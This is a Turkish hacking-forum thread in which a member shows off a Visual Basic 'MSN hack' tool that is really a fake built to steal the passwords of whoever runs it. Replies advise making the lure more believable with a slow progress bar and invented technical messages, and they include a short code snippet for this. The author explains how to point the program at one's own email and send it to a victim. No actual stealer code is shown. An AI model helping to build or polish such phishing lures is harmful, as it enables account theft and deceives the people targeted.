msn hack fake 2.versiyon(yorumlarınızı alabilirmiyim)

TCByİnTiK@m33

Uzman üye
17 Haz 2010
1,495
0
mersin
hayırlı akşamlar herkese visual basic 6 ile yapmış olduğum msn hack fakeyi size sunuyorum...!
iyi yada kötü yorumlarınızı paylaşırsanız sevinirim...!

proğramdan görüntü=
dsqt5.jpg

proğram linkini koymadım çünkü girdiğinizde şifreler bana gelicek...!
hoşunuza gittiyse yada geliştirmek istiyorsanız
kaynak kodunu özel mesaj ile verebilirim

NOT:ORJİNAL LAKABIM BYİNTİKAM ADIM ORHAN...!SONRA ALINTI DEMEYİN :D

HERKESE TEŞEKKÜRLER...!

\WoRTeX-CoSMoS/

Kıdemli Üye
27 Eki 2009
2,654
1
Bide Fazla İnanmazlar Gibi :)
Direk Hack'le Biraz DAha Elenti Yapsan Yada Koyduğun o Progressbar Güzel Ama Yavaş Dolarsa Daha İnandırıcı Olur. Bide Örnek
%25'e Geldiğinde Bir kaç Bilimsel Terim Uydur :D
Kod:
if progress1.value = 25 then
label1.text = "Şifreler Senkronize Ediliyor...."
end if

gibi :)
daha iyi olabilir.

TCByİnTiK@m33

Uzman üye
17 Haz 2010
1,495
0
mersin
hepinize teşekkür ederim arkadaşlar yorumlarınız için geliştirmeye çalışıcağım...sağolsınız

TCByİnTiK@m33

Uzman üye
17 Haz 2010
1,495
0
mersin
redmon41 kardeşim proğram fake ancak kodları kendi mailine göre ayarlayıp kurbana gönderip giriş yapmasını sağlamak...

et2 gönderiyorum kardeşim...!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.